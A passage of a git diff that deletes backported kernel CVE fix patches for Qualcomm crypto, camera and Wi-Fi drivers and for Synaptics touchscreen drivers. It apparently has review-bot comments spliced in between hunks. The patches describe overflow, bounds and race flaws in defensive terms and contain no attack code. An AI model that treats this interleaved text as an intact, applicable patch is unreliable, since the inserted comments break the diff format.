__copy_from_user(k_src, -+ if (user_src && copy_from_user(k_src, - (void __user *)user_src, - qcedev_areq->sha_op_req.data[0].len)) { - kzfree(k_buf_src); -@@ -648,7 +648,7 @@ static int qcedev_sha_update_max_xfer(struct qcedev_async_req *qcedev_areq, - k_src += qcedev_areq->sha_op_req.data[0].len; - for (i = 1; i < qcedev_areq->sha_op_req.entries; i++) { - user_src = (void __user *)qcedev_areq->sha_op_req.data[i].vaddr; -- if (user_src && __copy_from_user(k_src, -+ if (user_src && copy_from_user(k_src, - (void __user *)user_src, - qcedev_areq->sha_op_req.data[i].len)) { - 
kzfree(k_buf_src); -@@ -702,13 +702,6 @@ static int qcedev_sha_update(struct qcedev_async_req *qcedev_areq, - return -EINVAL; - } - -- /* verify address src(s) */ -- for (i = 0; i < qcedev_areq->sha_op_req.entries; i++) -- if (!access_ok(VERIFY_READ, -- (void __user *)qcedev_areq->sha_op_req.data[i].vaddr, -- qcedev_areq->sha_op_req.data[i].len)) -- return -EFAULT; -- - if (qcedev_areq->sha_op_req.data_len > QCE_MAX_OPER_DATA) { - - struct qcedev_sha_op_req *saved_req; -@@ -868,19 +861,7 @@ static int qcedev_hash_cmac(struct qcedev_async_req *qcedev_areq, - - total = qcedev_areq->sha_op_req.data_len; - -- /* verify address src(s) */ -- for (i = 0; i < qcedev_areq->sha_op_req.entries; i++) -- if (!access_ok(VERIFY_READ, -- (void __user *)qcedev_areq->sha_op_req.data[i].vaddr, -- qcedev_areq->sha_op_req.data[i].len)) -- return -EFAULT; -- -- /* Verify Source Address */ -- if (!access_ok(VERIFY_READ, -- (void __user *)qcedev_areq->sha_op_req.authkey, -- qcedev_areq->sha_op_req.authklen)) -- return -EFAULT; -- if (__copy_from_user(&handle->sha_ctxt.authkey[0], -+ if (copy_from_user(&handle->sha_ctxt.authkey[0], - (void __user *)qcedev_areq->sha_op_req.authkey, - qcedev_areq->sha_op_req.authklen)) - return -EFAULT; -@@ -900,7 +881,7 @@ static int qcedev_hash_cmac(struct qcedev_async_req *qcedev_areq, - for (i = 0; i < qcedev_areq->sha_op_req.entries; i++) { - user_src = - (void __user *)qcedev_areq->sha_op_req.data[i].vaddr; -- if (user_src && __copy_from_user(k_src, (void __user *)user_src, -+ if (user_src && copy_from_user(k_src, (void __user *)user_src, - qcedev_areq->sha_op_req.data[i].len)) { - kzfree(k_buf_src); - return -EFAULT; -@@ -928,12 +909,7 @@ static int qcedev_set_hmac_auth_key(struct qcedev_async_req *areq, - - if (areq->sha_op_req.authklen <= QCEDEV_MAX_KEY_SIZE) { - qcedev_sha_init(areq, handle); -- /* Verify Source Address */ -- if (!access_ok(VERIFY_READ, -- (void __user *)areq->sha_op_req.authkey, -- areq->sha_op_req.authklen)) -- return -EFAULT; -- 
if (__copy_from_user(&handle->sha_ctxt.authkey[0], -+ if (copy_from_user(&handle->sha_ctxt.authkey[0], - (void __user *)areq->sha_op_req.authkey, - areq->sha_op_req.authklen)) - return -EFAULT; -@@ -1146,7 +1122,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq, - byteoffset = areq->cipher_op_req.byteoffset; - - user_src = (void __user *)areq->cipher_op_req.vbuf.src[0].vaddr; -- if (user_src && __copy_from_user((k_align_src + byteoffset), -+ if (user_src && copy_from_user((k_align_src + byteoffset), - (void __user *)user_src, - areq->cipher_op_req.vbuf.src[0].len)) - return -EFAULT; -@@ -1156,7 +1132,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq, - for (i = 1; i < areq->cipher_op_req.entries; i++) { - user_src = - (void __user *)areq->cipher_op_req.vbuf.src[i].vaddr; -- if (user_src && __copy_from_user(k_align_src, -+ if (user_src && copy_from_user(k_align_src, - (void __user *)user_src, - areq->cipher_op_req.vbuf.src[i].len)) { - return -EFAULT; -@@ -1188,7 +1164,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq, - - while (creq->data_len > 0) { - if (creq->vbuf.dst[dst_i].len <= creq->data_len) { -- if (err == 0 && __copy_to_user( -+ if (err == 0 && copy_to_user( - (void __user *)creq->vbuf.dst[dst_i].vaddr, - (k_align_dst + byteoffset), - creq->vbuf.dst[dst_i].len)) -@@ -1199,7 +1175,7 @@ static int qcedev_vbuf_ablk_cipher_max_xfer(struct qcedev_async_req *areq, - creq->data_len -= creq->vbuf.dst[dst_i].len; - dst_i++; - } else { -- if (err == 0 && __copy_to_user( -+ if (err == 0 && copy_to_user( - (void __user *)creq->vbuf.dst[dst_i].vaddr, - (k_align_dst + byteoffset), - creq->data_len)) -@@ -1531,36 +1507,6 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req, - __func__, total, req->data_len); - goto error; - } -- /* Verify Source Address's */ -- for (i = 0, total = 0; i < req->entries; i++) { -- if (total < req->data_len) { -- if 
(!access_ok(VERIFY_READ, -- (void __user *)req->vbuf.src[i].vaddr, -- req->vbuf.src[i].len)) { -- pr_err("%s:SRC RD_VERIFY err %d=0x%lx\n", -- __func__, i, (uintptr_t) -- req->vbuf.src[i].vaddr); -- goto error; -- } -- total += req->vbuf.src[i].len; -- } -- } -- -- /* Verify Destination Address's */ -- for (i = 0, total = 0; i < QCEDEV_MAX_BUFFERS; i++) { -- if ((req->vbuf.dst[i].vaddr != 0) && -- (total < req->data_len)) { -- if (!access_ok(VERIFY_WRITE, -- (void __user *)req->vbuf.dst[i].vaddr, -- req->vbuf.dst[i].len)) { -- pr_err("%s:DST WR_VERIFY err %d=0x%lx\n", -- __func__, i, (uintptr_t) -- req->vbuf.dst[i].vaddr); -- goto error; -- } -- total += req->vbuf.dst[i].len; -- } -- } - return 0; - error: - return -EINVAL; -@@ -1656,11 +1602,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - switch (cmd) { - case QCEDEV_IOCTL_ENC_REQ: - case QCEDEV_IOCTL_DEC_REQ: -- if (!access_ok(VERIFY_WRITE, (void __user *)arg, -- sizeof(struct qcedev_cipher_op_req))) -- return -EFAULT; -- -- if (__copy_from_user(&qcedev_areq.cipher_op_req, -+ if (copy_from_user(&qcedev_areq.cipher_op_req, - (void __user *)arg, - sizeof(struct qcedev_cipher_op_req))) - return -EFAULT; -@@ -1673,20 +1615,17 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - err = qcedev_vbuf_ablk_cipher(&qcedev_areq, handle); - if (err) - return err; -- if (__copy_to_user((void __user *)arg, -+ if (copy_to_user((void __user *)arg, - &qcedev_areq.cipher_op_req, - sizeof(struct qcedev_cipher_op_req))) -- return -EFAULT; -+ return -EFAULT; - break; - - case QCEDEV_IOCTL_SHA_INIT_REQ: - { - struct scatterlist sg_src; -- if (!access_ok(VERIFY_WRITE, (void __user *)arg, -- sizeof(struct qcedev_sha_op_req))) -- return -EFAULT; - -- if (__copy_from_user(&qcedev_areq.sha_op_req, -+ if (copy_from_user(&qcedev_areq.sha_op_req, - (void __user *)arg, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; -@@ -1696,9 +1635,9 @@ long qcedev_ioctl(struct file *file, unsigned 
cmd, unsigned long arg) - err = qcedev_hash_init(&qcedev_areq, handle, &sg_src); - if (err) - return err; -- if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, -+ if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, - sizeof(struct qcedev_sha_op_req))) -- return -EFAULT; -+ return -EFAULT; - } - handle->sha_ctxt.init_done = true; - break; -@@ -1708,11 +1647,8 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - case QCEDEV_IOCTL_SHA_UPDATE_REQ: - { - struct scatterlist sg_src; -- if (!access_ok(VERIFY_WRITE, (void __user *)arg, -- sizeof(struct qcedev_sha_op_req))) -- return -EFAULT; - -- if (__copy_from_user(&qcedev_areq.sha_op_req, -+ if (copy_from_user(&qcedev_areq.sha_op_req, - (void __user *)arg, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; -@@ -1734,10 +1670,15 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - return err; - } - -+ if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) { -+ pr_err("Invalid sha_ctxt.diglen %d\n", -+ handle->sha_ctxt.diglen); -+ return -EINVAL; -+ } - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], - handle->sha_ctxt.diglen); -- if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, -+ if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; - } -@@ -1749,11 +1690,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - pr_err("%s Init was not called\n", __func__); - return -EINVAL; - } -- if (!access_ok(VERIFY_WRITE, (void __user *)arg, -- sizeof(struct qcedev_sha_op_req))) -- return -EFAULT; -- -- if (__copy_from_user(&qcedev_areq.sha_op_req, -+ if (copy_from_user(&qcedev_areq.sha_op_req, - (void __user *)arg, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; -@@ -1767,7 +1704,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], - 
handle->sha_ctxt.diglen); -- if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, -+ if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; - handle->sha_ctxt.init_done = false; -@@ -1776,11 +1713,8 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - case QCEDEV_IOCTL_GET_SHA_REQ: - { - struct scatterlist sg_src; -- if (!access_ok(VERIFY_WRITE, (void __user *)arg, -- sizeof(struct qcedev_sha_op_req))) -- return -EFAULT; - -- if (__copy_from_user(&qcedev_areq.sha_op_req, -+ if (copy_from_user(&qcedev_areq.sha_op_req, - (void __user *)arg, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; -@@ -1798,7 +1732,7 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], - handle->sha_ctxt.diglen); -- if (__copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, -+ if (copy_to_user((void __user *)arg, &qcedev_areq.sha_op_req, - sizeof(struct qcedev_sha_op_req))) - return -EFAULT; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0521/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0521/3.18/0001.patch deleted file mode 100644 index 21f4cc92..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0521/3.18/0001.patch +++ /dev/null 
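Review bot: The `handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST` check is added only in the hunk at -1734 (apparently the SHA update case). The same `memcpy(&qcedev_areq.sha_op_req.digest[0], &handle->sha_ctxt.digest[0], handle->sha_ctxt.diglen);` appears as unchanged context in the hunks at -1767 and -1798 (the final and QCEDEV_IOCTL_GET_SHA_REQ paths) with no bound visible. Unless diglen is validated somewhere outside these hunks, those two copies into the fixed-size digest field need the same guard. A small static helper that checks the length and performs the copy would keep the three sites consistent. qcedev_ioctl() extends well beyond the hunks shown, so this should be confirmed against the full function.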
@@ -1,46 +0,0 @@ -From dbe4f26f200db10deaf38676b96d8738afcc10c8 Mon Sep 17 00:00:00 2001 -From: Kumar Behera -Date: Fri, 9 Dec 2016 09:55:00 -0800 -Subject: msm: cpp: Fix for integer overflow in cpp - -Due to integer overflow ,the bound check in config frame function -may pass and this may allow user to access invalid buffer. This -fix takes care of proper bound and don't allow integer overflow. - -CRs-Fxied: 1097709 -Change-Id: I504ad591633afaba82268b5ee27a321691d75c80 -Signed-off-by: Kumar Behera ---- - drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -index f64f79b..e81a9f9 100644 ---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -@@ -2376,7 +2376,7 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev, - struct msm_buf_mngr_info buff_mgr_info, dup_buff_mgr_info; - int32_t in_fd; - int32_t num_output_bufs = 1; -- int32_t stripe_base = 0; -+ uint32_t stripe_base = 0; - uint32_t stripe_size; - uint8_t tnr_enabled; - enum msm_camera_buf_mngr_buf_type buf_type = -@@ -2411,6 +2411,13 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev, - return -EINVAL; - } - -+ if (stripe_base == UINT_MAX || new_frame->num_strips > -+ (UINT_MAX - 1 - stripe_base) / stripe_size) { -+ pr_err("Invalid frame message,num_strips %d is large\n", -+ new_frame->num_strips); -+ return -EINVAL; -+ } -+ - if ((stripe_base + new_frame->num_strips * stripe_size + 1) != - new_frame->msg_len) { - pr_err("Invalid frame message,len=%d,expected=%d\n", --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0521/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0521/4.4/0002.patch deleted file mode 100644 index 6171f882..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0521/4.4/0002.patch +++ /dev/null 
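Review bot: The new bound in msm_cpp_cfg_frame() divides by `stripe_size`, which is assigned outside this hunk. If any path can leave it zero the check itself faults, so it is worth confirming that every branch reaching this point sets a non-zero size. A short comment above the test would explain why `stripe_base == UINT_MAX` is special-cased, e.g. `/* reject values for which stripe_base + num_strips * stripe_size + 1 would wrap */`. `num_strips` is printed with `%d`, and `%u` is the matching specifier if the field is unsigned, which the hunk does not show. The 4.4 copy of this patch that follows on the page is identical, so the same points apply there.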
@@ -1,46 +0,0 @@ -From 77c4aba67d89ba4055b7c9bd417f49593cba497b Mon Sep 17 00:00:00 2001 -From: Kumar Behera -Date: Fri, 9 Dec 2016 09:55:00 -0800 -Subject: msm: cpp: Fix for integer overflow in cpp - -Due to integer overflow ,the bound check in config frame function -may pass and this may allow user to access invalid buffer. This -fix takes care of proper bound and don't allow integer overflow. - -CRs-Fxied: 1097709 -Change-Id: I504ad591633afaba82268b5ee27a321691d75c80 -Signed-off-by: Kumar Behera ---- - drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -index b7724b4..5be2748 100644 ---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c -@@ -2479,7 +2479,7 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev, - struct msm_buf_mngr_info buff_mgr_info, dup_buff_mgr_info; - int32_t in_fd; - int32_t num_output_bufs = 1; -- int32_t stripe_base = 0; -+ uint32_t stripe_base = 0; - uint32_t stripe_size; - uint8_t tnr_enabled; - enum msm_camera_buf_mngr_buf_type buf_type = -@@ -2514,6 +2514,13 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev, - return -EINVAL; - } - -+ if (stripe_base == UINT_MAX || new_frame->num_strips > -+ (UINT_MAX - 1 - stripe_base) / stripe_size) { -+ pr_err("Invalid frame message,num_strips %d is large\n", -+ new_frame->num_strips); -+ return -EINVAL; -+ } -+ - if ((stripe_base + new_frame->num_strips * stripe_size + 1) != - new_frame->msg_len) { - pr_err("Invalid frame message,len=%d,expected=%d\n", --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0523/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0523/3.18/0001.patch deleted file mode 100644 index cbd30c4a..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0523/3.18/0001.patch +++ /dev/null 
@@ -1,75 +0,0 @@
-From 5bb646471da76d3d5cd02cf3da7a03ce6e3cb582 Mon Sep 17 00:00:00 2001
-From: Hamad Kadmany
-Date: Sun, 18 Dec 2016 15:03:11 +0200
-Subject: wil6210: Block write ioctl to the card by default
-
-The ability to write to the card is used for debug purposes.
-The ability is disabled by default to prevent misuse of
-this functionality.
-
-CRs-Fixed: 1096945
-Change-Id: I8fc3f646a0127ec705239be6a7de858a4f805acc
-Signed-off-by: Hamad Kadmany
----
- drivers/net/wireless/ath/wil6210/Kconfig | 11 +++++++++++
- drivers/net/wireless/ath/wil6210/ioctl.c | 4 ++++
- 2 files changed, 15 insertions(+)
-
-diff --git a/drivers/net/wireless/ath/wil6210/Kconfig b/drivers/net/wireless/ath/wil6210/Kconfig
-index 481680a..eaa5a9d 100644
---- a/drivers/net/wireless/ath/wil6210/Kconfig
-+++ b/drivers/net/wireless/ath/wil6210/Kconfig
-@@ -40,6 +40,17 @@ config WIL6210_TRACING
-
- If unsure, say Y to make it easier to debug problems.
-
-+config WIL6210_WRITE_IOCTL
-+ bool "wil6210 write ioctl to the device"
-+ depends on WIL6210
-+ default n
-+ ---help---
-+ Say Y here to allow write-access from user-space to
-+ the device memory through ioctl. This is useful for
-+ debugging purposes only.
-+
-+ If unsure, say N.
-+
- config WIL6210_PLATFORM_MSM
- bool "wil6210 MSM platform specific support"
- depends on WIL6210
-diff --git a/drivers/net/wireless/ath/wil6210/ioctl.c b/drivers/net/wireless/ath/wil6210/ioctl.c
-index e9c0673..f5ad473 100644
---- a/drivers/net/wireless/ath/wil6210/ioctl.c
-+++ b/drivers/net/wireless/ath/wil6210/ioctl.c
-@@ -79,10 +79,12 @@ static int wil_ioc_memio_dword(struct wil6210_priv *wil, void __user *data)
- io.val = ioread32(a);
- need_copy = true;
- break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- case wil_mmio_write:
- iowrite32(io.val, a);
- wmb(); /* make sure write propagated to HW */
- break;
-+#endif
- default:
- wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- return -EINVAL;
-@@ -139,6 +141,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- goto out_free;
- }
- break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- case wil_mmio_write:
- if (copy_from_user(block, io.block, io.size)) {
- rc = -EFAULT;
-@@ -148,6 +151,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- wmb(); /* make sure write propagated to HW */
- wil_hex_dump_ioctl("Write ", block, io.size);
- break;
-+#endif
- default:
- wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- rc = -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0523/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0523/4.4/0002.patch
deleted file mode 100644
index 3c107112..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0523/4.4/0002.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 2c7b4349b858398caf0ae146e87554c3502d20a5 Mon Sep 17 00:00:00 2001
-From: Hamad Kadmany
-Date: Sun, 18 Dec 2016 15:03:11 +0200
-Subject: wil6210: Block write ioctl to the card by default
-
-The ability to write to the card is used for debug purposes.
-The ability is disabled by default to prevent misuse of
-this functionality.
-
-CRs-Fixed: 1096945
-Change-Id: I8fc3f646a0127ec705239be6a7de858a4f805acc
-Signed-off-by: Hamad Kadmany
----
- drivers/net/wireless/ath/wil6210/Kconfig | 11 +++++++++++
- drivers/net/wireless/ath/wil6210/ioctl.c | 4 ++++
- 2 files changed, 15 insertions(+)
-
-diff --git a/drivers/net/wireless/ath/wil6210/Kconfig b/drivers/net/wireless/ath/wil6210/Kconfig
-index 9e3961c..8f0bde5 100644
---- a/drivers/net/wireless/ath/wil6210/Kconfig
-+++ b/drivers/net/wireless/ath/wil6210/Kconfig
-@@ -41,6 +41,17 @@ config WIL6210_TRACING
-
- If unsure, say Y to make it easier to debug problems.
-
-+config WIL6210_WRITE_IOCTL
-+ bool "wil6210 write ioctl to the device"
-+ depends on WIL6210
-+ default n
-+ ---help---
-+ Say Y here to allow write-access from user-space to
-+ the device memory through ioctl. This is useful for
-+ debugging purposes only.
-+
-+ If unsure, say N.
-+
- config WIL6210_PLATFORM_MSM
- bool "wil6210 MSM platform specific support"
- depends on WIL6210
-diff --git a/drivers/net/wireless/ath/wil6210/ioctl.c b/drivers/net/wireless/ath/wil6210/ioctl.c
-index 47058ccc..bbdd232 100644
---- a/drivers/net/wireless/ath/wil6210/ioctl.c
-+++ b/drivers/net/wireless/ath/wil6210/ioctl.c
-@@ -87,10 +87,12 @@ static int wil_ioc_memio_dword(struct wil6210_priv *wil, void __user *data)
- io.val = readl(a);
- need_copy = true;
- break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- case wil_mmio_write:
- writel(io.val, a);
- wmb(); /* make sure write propagated to HW */
- break;
-+#endif
- default:
- wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- return -EINVAL;
-@@ -147,6 +149,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- goto out_free;
- }
- break;
-+#if defined(CONFIG_WIL6210_WRITE_IOCTL)
- case wil_mmio_write:
- if (copy_from_user(block, io.block, io.size)) {
- rc = -EFAULT;
-@@ -156,6 +159,7 @@ static int wil_ioc_memio_block(struct wil6210_priv *wil, void __user *data)
- wmb(); /* make sure write propagated to HW */
- wil_hex_dump_ioctl("Write ", block, io.size);
- break;
-+#endif
- default:
- wil_err(wil, "Unsupported operation, op = 0x%08x\n", io.op);
- rc = -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0524/ANY/0001.patch
deleted file mode 100644
index e4a248b6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0001.patch
+++ /dev/null
@@ -1,118 +0,0 @@
-From e1fb1600fc222337989e3084d68df929882deae5 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Tue, 17 Jan 2017 07:37:52 -0800
-Subject: [PATCH] input: synaptics: put offset checks under mutex.
-
-Place file offset validity checks under mutex.
-
-BUG: 33555878
-BUG: 33002026
-
-Change-Id: I1945cfc8af7d1a310ae0d7bbb85002d4c448f30b
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/synaptics_rmi_dev.c | 52 ++++++++++++++++++---------
- 1 file changed, 36 insertions(+), 16 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_rmi_dev.c b/drivers/input/touchscreen/synaptics_rmi_dev.c
-index e2d7c27eb6832..e7c19d00c0544 100644
---- a/drivers/input/touchscreen/synaptics_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_rmi_dev.c
-@@ -299,18 +299,26 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-
-- tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-- if (!tmpbuf)
-- return -ENOMEM;
-+ if (count == 0) {
-+ retval = 0;
-+ goto unlock;
-+ }
-
-- mutex_lock(&(dev_data->file_mutex));
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
-
-+ tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-+ if (!tmpbuf) {
-+ retval = -ENOMEM;
-+ goto unlock;
-+ }
- retval = rmidev->fn_ptr->read(rmidev->rmi4_data,
- *f_pos,
- tmpbuf,
-@@ -324,9 +332,10 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- *f_pos += retval;
-
- clean_up:
-+ kfree(tmpbuf);
-+unlock:
- mutex_unlock(&(dev_data->file_mutex));
-
-- kfree(tmpbuf);
- return retval;
- }
-
-@@ -350,23 +359,32 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-+
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
-
- if (count >
(REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-
-+ if (count == 0) {
-+ retval = 0;
-+ goto unlock;
-+ }
-+
- tmpbuf = kzalloc(count + 1, GFP_KERNEL);
-- if (!tmpbuf)
-- return -ENOMEM;
-+ if (!tmpbuf) {
-+ retval = -ENOMEM;
-+ goto unlock;
-+ }
-
- if (copy_from_user(tmpbuf, buf, count)) {
-- kfree(tmpbuf);
-- return -EFAULT;
-+ retval = -EFAULT;
-+ goto clean_up;
- }
-
-- mutex_lock(&(dev_data->file_mutex));
--
- retval = rmidev->fn_ptr->write(rmidev->rmi4_data,
- *f_pos,
- tmpbuf,
-@@ -374,8 +392,10 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- if (retval >= 0)
- *f_pos += retval;
-
-- mutex_unlock(&(dev_data->file_mutex));
-+clean_up:
- kfree(tmpbuf);
-+unlock:
-+ mutex_unlock(&(dev_data->file_mutex));
- return retval;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0524/ANY/0002.patch
deleted file mode 100644
index e4a087c5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0002.patch
+++ /dev/null
@@ -1,85 +0,0 @@
-From 0ab30d91fb178c5967753343029581983a4e9b67 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 13 Jan 2017 13:33:57 -0800
-Subject: [PATCH] input: synaptics_dsx: protect tmpbuf allocation.
-
-Protect tmpbuf from concurrent access by mutex.
-
-BUG: 33555878
-BUG: 33002026
-Change-Id: Ia986a34647d5825946594ea17a5cd6fa0abb115f
-Signed-off-by: Andrew Chant
----
- .../synaptics_dsx25/synaptics_dsx_rmi_dev.c | 33 +++++++++++++++-------
- 1 file changed, 23 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c
-index 87abf86cdc6b4..018c621c0cfeb 100644
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_rmi_dev.c
-@@ -483,16 +483,21 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto clean_up;
-+ }
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-+ if (count == 0) {
-+ retval = 0;
-+ goto clean_up;
-+ }
-
- rmidev_allocate_buffer(count);
-
-- mutex_lock(&(dev_data->file_mutex));
--
- retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
- *f_pos,
- rmidev->tmpbuf,
-@@ -530,18 +535,25 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- return -EBADF;
- }
-
-- if (count == 0)
-- return 0;
-+ mutex_lock(&(dev_data->file_mutex));
-
-+ if (*f_pos > REG_ADDR_LIMIT) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
- if (count > (REG_ADDR_LIMIT - *f_pos))
- count = REG_ADDR_LIMIT - *f_pos;
-+ if (count == 0) {
-+ retval = 0;
-+ goto unlock;
-+ }
-
- rmidev_allocate_buffer(count);
-
-- if (copy_from_user(rmidev->tmpbuf, buf, count))
-- return -EFAULT;
--
-- mutex_lock(&(dev_data->file_mutex));
-+ if (copy_from_user(rmidev->tmpbuf,
buf, count)) {
-+ retval = -EFAULT;
-+ goto unlock;
-+ }
-
- retval = synaptics_rmi4_reg_write(rmidev->rmi4_data,
- *f_pos,
-@@ -550,6 +562,7 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- if (retval >= 0)
- *f_pos += retval;
-
-+unlock:
- mutex_unlock(&(dev_data->file_mutex));
-
- return retval;
diff --git a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-0524/ANY/0003.patch
deleted file mode 100644
index 24e8b2ed..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0524/ANY/0003.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From e6430a4da1fb0212a546379eadbe986f629c3ae9 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 13 Jan 2017 11:41:03 -0800
-Subject: [PATCH] input: synaptics_dsx: protect tmpbuf allocation.
-
-Protect tmpbuf from concurrent access by mutex.
-
-BUG: 33555878
-BUG: 33002026
-Change-Id: Ia7eeb59ca7b626f416e2298b4b9ffd960fe909e4
-Signed-off-by: Andrew Chant
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c | 36 ++++++++++++++--------
- 1 file changed, 24 insertions(+), 12 deletions(-)
-
